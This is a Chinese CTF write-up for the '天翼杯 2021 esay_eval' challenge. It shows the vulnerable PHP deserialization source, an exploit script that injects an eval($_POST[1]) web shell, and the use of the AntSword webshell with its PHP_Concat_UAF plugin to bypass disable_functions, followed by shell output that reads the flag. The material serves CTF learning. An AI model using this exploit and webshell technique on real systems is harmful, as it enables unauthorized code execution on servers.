[蚁剑插件之绕disable_functions-CSDN博客](https://blog.csdn.net/zlzg007/article/details/108462813#:~:text=蚁剑插件之绕disable_functions概述有些网站会禁用php中的一些危险函数,导致即使上传马上去,也执行不了命令,很典型的就是宝塔的网站。  蚁剑有个插件专门用于解决这个问题。,绕过的方法有好几种,大多都是针对linux%2C有一个windows能用,但经过尝试还是不行,所以说如果碰到windows这种情况,就可以直接放弃了。 方法直接运行插件,选择绕过方式:然后,直接开始,运行成功后会生成两个文件:直接使用蚁剑连接.antproxy.php那个文件,密码还是原来的密码,就可以命令执行了_disable_functions)
例题:[天翼杯 2021]esay_eval 天翼杯 2021]esay_eval——Redis(主从复制)提权初见_redis主从提权-CSDN博客 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php class  A  {     public  $code  = "" ;     function  __call ($method ,$args  ) {         eval ($this ->code);              }     function  __wakeup ( ) {         $this ->code = "" ;     } }class  B  {     function  __destruct ( ) {         echo  $this ->a->a ();     } }if (isset ($_REQUEST ['poc' ])){     preg_match_all ('/"[BA]":(.*?):/s' ,$_REQUEST ['poc' ],$ret );     if  (isset ($ret [1 ])) {         foreach  ($ret [1 ] as  $i ) {             if (intval ($i )!==1 ){                 exit ("you want to bypass wakeup ? no !" );             }         }         unserialize ($_REQUEST ['poc' ]);         } }else {     highlight_file (__FILE__ ); }
 
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php class  a  {     function  __construct ( ) {         $this ->code="eval($_POST [1]);" ;     } }class  b  {     public  $a ; }$c =new  b ();$c ->a=new  a ();echo  serialize ($c );
 
蚁剑连
方法一 使用蚁剑插件 右键加载插件绕过disable_functions
 
模式选择PHP_Concat_UAF,点击开始
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 (www-data:/var/www/html) $ ls  config.php.swp index.php (www-data:/var/www/html) $ ls  / bin boot dev etc flagaasdbjanssctf home lib lib64 media mnt opt proc redis-5.0.10 root run run.sh sbin srv sys tmp usr var (www-data:/var/www/html) $ cat  /f* NSSCTF{524d9644-669d-42b6-8ac2-f8b3554d6254}